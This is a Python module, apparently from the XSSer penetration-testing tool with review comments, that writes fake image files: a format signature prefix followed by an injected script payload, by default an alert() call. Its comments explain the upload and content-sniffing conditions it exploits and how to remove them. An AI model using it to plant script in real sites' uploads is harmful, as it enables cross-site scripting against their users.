imagexss.py 2.3 KB

  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. # vim: set expandtab tabstop=4 shiftwidth=4:
  4. """
  5. This file is part of the XSSer project, https://xsser.03c8.net
  6. Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
  7. xsser is free software; you can redistribute it and/or modify it under
  8. the terms of the GNU General Public License as published by the Free
  9. Software Foundation version 3 of the License.
  10. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
  11. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  12. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
  13. details.
  14. You should have received a copy of the GNU General Public License along
  15. with xsser; if not, write to the Free Software Foundation, Inc., 51
  16. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  17. """
  18. import os
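class ImageInjections(object):
    """
    Build files that are named like images but contain markup.

    Each generated file is a short signature-like text prefix followed by
    an HTML/script string. A file of this shape only has an effect on an
    application that accepts uploads by extension or leading bytes and
    later serves them with a sniffable or HTML content type. Decoding and
    re-encoding uploaded images, and serving them with an accurate
    Content-Type plus ``X-Content-Type-Options: nosniff``, removes that
    condition.
    """

    # Text written ahead of the payload for each accepted extension.
    # NOTE(review): these are text literals copied as they appear in the
    # source; the bytes that reach disk depend on the source encoding and
    # are not guaranteed to equal the binary signatures of the real
    # formats -- confirm before relying on them in a test fixture.
    _PREFIXES = {
        ".png": '‰PNG',
        ".gif": 'GIF89a',
        ".jpg": 'ÿØÿà JFIF',
        ".bmp": 'BMFÖ',
    }

    def __init__(self, payload =''):
        # Stored for callers; image_xss() below takes its payload as an
        # argument and does not read this attribute.
        self._payload = payload

    def image_xss(self, filename, payload):
        """
        Create -fake- image with code XSS injected.

        filename -- path to write; its extension (case-insensitive) must be
                    .png, .jpg, .gif or .bmp. The path is opened as given in
                    'wb' mode, so an existing file at that path is replaced.
        payload  -- markup appended after the prefix; an empty value falls
                    back to a fixed alert() script string.

        Returns the "[Error] ..." string for an unsupported extension.
        On success returns a 2-tuple (see the note at the return value).
        """
        # check user image name input valid extensions
        root, ext = os.path.splitext(filename)
        prefix = self._PREFIXES.get(ext.lower())
        if prefix is None:
            return "\n[Error] Supported extensions = .PNG, .GIF, .JPG or .BMP\n"

        # check user payload input
        user_payload = payload or "<script>alert('XSS')</script>"

        # Build the content before touching the filesystem, so a payload
        # that cannot be concatenated does not leave an empty or truncated
        # file behind.
        content = prefix + user_payload

        # The context manager closes the handle even if write() raises.
        # NOTE(review): content is a text string written to a binary-mode
        # file; that is Python 2 str semantics. Under Python 3 this write
        # raises TypeError.
        with open(filename, 'wb') as f:
            f.write(content)

        # NOTE(review): the comma before `root` makes this a 2-tuple
        # (message, "<file>\n") rather than one string. It is kept as-is
        # because callers outside this file may depend on the shape; it
        # looks like `+` was intended -- confirm against the callers.
        image_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
        return image_results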
if __name__ == '__main__':
    # Manual demo run: writes one sample file into the current working
    # directory and prints whatever image_xss() returns.
    demo_filename = 'ImageXSSpoison.png'
    demo_payload = "<script>alert('XSS')</script>"
    image_xss_injection = ImageInjections('')
    print image_xss_injection.image_xss(demo_filename, demo_payload)